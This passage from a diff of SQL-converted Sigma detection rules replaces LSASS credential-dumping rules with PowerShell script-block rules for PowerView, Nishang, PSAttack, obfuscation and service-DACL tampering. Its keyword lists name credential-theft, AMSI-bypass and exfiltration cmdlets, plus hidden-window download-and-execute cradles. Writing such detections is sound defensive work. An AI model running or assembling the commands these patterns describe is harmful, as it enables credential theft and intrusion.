"attack.defense_evasion", - "attack.t1003.001" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "status": "experimental", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", - "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "status": "experimental", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.t1548" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.impact" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' 